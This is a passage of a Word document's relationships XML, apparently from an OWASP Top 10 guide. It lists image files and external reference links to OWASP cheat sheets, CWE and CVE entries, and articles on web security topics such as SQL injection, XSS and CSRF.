TargetMode="External"/><Relationship Id="rId227" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/384.html" TargetMode="External"/><Relationship Id="rId228" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/384.html" TargetMode="External"/><Relationship Id="rId229" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/384.html" TargetMode="External"/><Relationship Id="rId450" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId451" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId452" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId453" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Testing_for_SSL-TLS" TargetMode="External"/><Relationship Id="rId454" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/310.html" TargetMode="External"/><Relationship Id="rId455" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/310.html" TargetMode="External"/><Relationship Id="rId456" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/310.html" TargetMode="External"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId459" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/310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12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Query_Parameterization_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId117" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Query_Parameterization_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Query_Parameterization_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Query_Parameterization_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId457" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/310.html" TargetMode="External"/><Relationship Id="rId458" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/310.html" TargetMode="External"/><Relationship Id="rId680" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.troyhunt.com/2011/12/owasp-top-10-for-net-developers-part-10.html" TargetMode="External"/><Relationship Id="rId681" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.troyhunt.com/2011/12/owasp-top-10-for-net-developers-part-10.html" TargetMode="External"/><Relationship Id="rId682" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.troyhunt.com/2011/12/owasp-top-10-for-net-developers-part-10.html" TargetMode="External"/><Relationship Id="rId683" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.troyhunt.com/2011/12/owasp-top-10-for-net-developers-part-10.html" TargetMode="External"/><Relationship Id="rId684" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.troyhunt.com/2011/12/owasp-top-10-for-net-developers-part-10.html" TargetMode="External"/><Relationship Id="rId685" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.troyhunt.com/2011/12/owasp-top-10-for-net-developers-part-10.html" TargetMode="External"/><Relationship Id="rId686" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.troyhunt.com/2011/12/owasp-top-10-for-net-developers-part-10.html" TargetMode="External"/><Relationship Id="rId340" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image51.jpeg"/><Relationship Id="rId341" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image52.jpeg"/><Relationship Id="rId342" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image53.jpeg"/><Relationship Id="rId343" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Configuration" TargetMode="External"/><Relationship Id="rId344" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Configuration" TargetMode="External"/><Relationship Id="rId345" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Configuration" TargetMode="External"/><Relationship Id="rId346" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Configuration" TargetMode="External"/><Relationship Id="rId347" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Configuration" TargetMode="External"/><Relationship Id="rId348" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Configuration" TargetMode="External"/><Relationship Id="rId349" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Error_Handling" TargetMode="External"/><Relationship Id="rId687" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.troyhunt.com/2011/12/owasp-top-10-for-net-developers-part-10.html" TargetMode="External"/><Relationship Id="rId688" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.troyhunt.com/2011/12/owasp-top-10-for-net-developers-part-10.html" TargetMode="External"/><Relationship Id="rId689" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.troyhunt.com/2011/12/owasp-top-10-for-net-developers-part-10.html" TargetMode="External"/><Relationship Id="rId570" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Testing_for_CSRF_(OWASP-SM-005)" TargetMode="External"/><Relationship Id="rId571" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Testing_for_CSRF_(OWASP-SM-005)" TargetMode="External"/><Relationship Id="rId572" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Testing_for_CSRF_(OWASP-SM-005)" TargetMode="External"/><Relationship Id="rId573" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Testing_for_CSRF_(OWASP-SM-005)" TargetMode="External"/><Relationship Id="rId574" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/CSRFTester" TargetMode="External"/><Relationship Id="rId575" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/CSRFTester" TargetMode="External"/><Relationship Id="rId576" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/CSRFTester" TargetMode="External"/><Relationship Id="rId230" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)" TargetMode="External"/><Relationship Id="rId231" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/DOM_Based_XSS" TargetMode="External"/><Relationship Id="rId232" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/DOM_Based_XSS" TargetMode="External"/><Relationship Id="rId233" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/DOM_Based_XSS" TargetMode="External"/><Relationship Id="rId234" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/DOM_Based_XSS" TargetMode="External"/><Relationship Id="rId235" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.jpeg"/><Relationship Id="rId236" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.jpeg"/><Relationship Id="rId237" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.jpeg"/><Relationship Id="rId238" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.jpeg"/><Relationship Id="rId239" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.jpeg"/><Relationship Id="rId577" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/352.html" TargetMode="External"/><Relationship Id="rId578" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/352.html" TargetMode="External"/><Relationship Id="rId579" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/352.html" TargetMode="External"/><Relationship Id="rId460" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/312.html" TargetMode="External"/><Relationship Id="rId461" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/312.html" TargetMode="External"/><Relationship Id="rId462" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/312.html" TargetMode="External"/><Relationship Id="rId463" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/312.html" TargetMode="External"/><Relationship Id="rId464" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/312.html" TargetMode="External"/><Relationship Id="rId465" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/312.html" TargetMode="External"/><Relationship Id="rId466" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/312.html" TargetMode="External"/><Relationship Id="rId467" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/312.html" TargetMode="External"/><Relationship Id="rId468" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/312.html" TargetMode="External"/><Relationship Id="rId469" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/319.html" TargetMode="External"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Query_Parameterization_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Command_Injection" TargetMode="External"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Command_Injection" TargetMode="External"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Command_Injection" TargetMode="External"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Command_Injection" TargetMode="External"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/XXE" TargetMode="External"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/XXE" TargetMode="External"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/XXE" TargetMode="External"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/XXE" TargetMode="External"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/XXE" TargetMode="External"/><Relationship Id="rId690" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image99.jpeg"/><Relationship Id="rId691" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image100.jpeg"/><Relationship Id="rId692" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/OWASP_Secure_Software_Contract_Annex" TargetMode="External"/><Relationship Id="rId693" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/OWASP_Secure_Software_Contract_Annex" TargetMode="External"/><Relationship Id="rId694" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/OWASP_Secure_Software_Contract_Annex" TargetMode="External"/><Relationship Id="rId695" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/OWASP_Secure_Software_Contract_Annex" TargetMode="External"/><Relationship Id="rId696" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/OWASP_Secure_Software_Contract_Annex" TargetMode="External"/><Relationship Id="rId350" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Error_Handling" TargetMode="External"/><Relationship Id="rId351" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Error_Handling" TargetMode="External"/><Relationship Id="rId352" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Error_Handling" TargetMode="External"/><Relationship Id="rId353" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Error_Handling" TargetMode="External"/><Relationship Id="rId354" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Error_Handling" TargetMode="External"/><Relationship Id="rId355" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Error_Handling" TargetMode="External"/><Relationship Id="rId356" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Error_Handling" TargetMode="External"/><Relationship Id="rId357" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Testing_for_configuration_management" TargetMode="External"/><Relationship Id="rId358" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Testing_for_configuration_management" TargetMode="External"/><Relationship Id="rId359" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Testing_for_configuration_management" TargetMode="External"/><Relationship Id="rId697" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/OWASP_Secure_Software_Contract_Annex" TargetMode="External"/><Relationship Id="rId698" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Cheat_Sheets" TargetMode="External"/><Relationship Id="rId699" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Cheat_Sheets" TargetMode="External"/><Relationship Id="rId580" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/352.html" TargetMode="External"/><Relationship Id="rId581" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/352.html" TargetMode="External"/><Relationship Id="rId582" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image81.jpeg"/><Relationship Id="rId583" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image82.jpeg"/><Relationship Id="rId584" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image83.jpeg"/><Relationship Id="rId585" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image84.jpeg"/><Relationship Id="rId586" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image85.jpeg"/><Relationship Id="rId240" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.jpeg"/><Relationship Id="rId241" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.jpeg"/><Relationship Id="rId242" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.jpeg"/><Relationship Id="rId243" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.jpeg"/><Relationship Id="rId244" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/images/c/c5/Unraveling_some_Mysteries_around_DOM-based_XSS.pdf" TargetMode="External"/><Relationship Id="rId245" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/images/c/c5/Unraveling_some_Mysteries_around_DOM-based_XSS.pdf" TargetMode="External"/><Relationship Id="rId246" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/images/c/c5/Unraveling_some_Mysteries_around_DOM-based_XSS.pdf" TargetMode="External"/><Relationship Id="rId247" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer_Project" TargetMode="External"/><Relationship Id="rId248" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer_Project" TargetMode="External"/><Relationship Id="rId249" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer_Project" TargetMode="External"/><Relationship Id="rId587" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image86.jpeg"/><Relationship Id="rId588" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image87.jpeg"/><Relationship Id="rId589" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image88.jpeg"/><Relationship Id="rId470" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/319.html" TargetMode="External"/><Relationship Id="rId471" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/319.html" TargetMode="External"/><Relationship Id="rId472" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/319.html" TargetMode="External"/><Relationship Id="rId473" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/319.html" TargetMode="External"/><Relationship Id="rId474" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/319.html" TargetMode="External"/><Relationship Id="rId475" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/319.html" TargetMode="External"/><Relationship Id="rId476" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/319.html" TargetMode="External"/><Relationship Id="rId477" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/326.html" TargetMode="External"/><Relationship Id="rId478" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/326.html" TargetMode="External"/><Relationship Id="rId479" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/326.html" TargetMode="External"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/XXE" TargetMode="External"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/XXE" TargetMode="External"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OWASP-DV-005)" TargetMode="External"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OWASP-DV-005)" TargetMode="External"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OWASP-DV-005)" TargetMode="External"/><Relationship Id="rId360" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Testing_for_configuration_management" TargetMode="External"/><Relationship Id="rId361" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Testing_for_configuration_management" TargetMode="External"/><Relationship Id="rId362" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Testing_for_Error_Code_(OWASP-IG-006)" TargetMode="External"/><Relationship Id="rId363" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Testing_for_Error_Code_(OWASP-IG-006)" TargetMode="External"/><Relationship Id="rId364" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Testing_for_Error_Code_(OWASP-IG-006)" TargetMode="External"/><Relationship Id="rId365" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Testing_for_Error_Code_(OWASP-IG-006)" TargetMode="External"/><Relationship Id="rId366" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Testing_for_Error_Code_(OWASP-IG-006)" TargetMode="External"/><Relationship Id="rId367" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Testing_for_Error_Code_(OWASP-IG-006)" TargetMode="External"/><Relationship Id="rId368" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Testing_for_Error_Code_(OWASP-IG-006)" TargetMode="External"/><Relationship Id="rId369" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/A10_2004_Insecure_Configuration_Management" TargetMode="External"/><Relationship Id="rId590" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image89.jpeg"/><Relationship Id="rId591" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org/" TargetMode="External"/><Relationship Id="rId592" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3451" TargetMode="External"/><Relationship Id="rId593" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3451" TargetMode="External"/><Relationship Id="rId594" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3451" TargetMode="External"/><Relationship Id="rId595" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3451" TargetMode="External"/><Relationship Id="rId596" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.infosecurity-magazine.com/view/30282/remote-code-vulnerability-in-spring-framework-for-java/" TargetMode="External"/><Relationship Id="rId250" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer_Project" TargetMode="External"/><Relationship Id="rId251" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer_Project" TargetMode="External"/><Relationship Id="rId252" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId253" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId254" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId255" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId256" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId257" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId258" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId259" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId597" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.infosecurity-magazine.com/view/30282/remote-code-vulnerability-in-spring-framework-for-java/" TargetMode="External"/><Relationship Id="rId598" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.infosecurity-magazine.com/view/30282/remote-code-vulnerability-in-spring-framework-for-java/" TargetMode="External"/><Relationship Id="rId599" 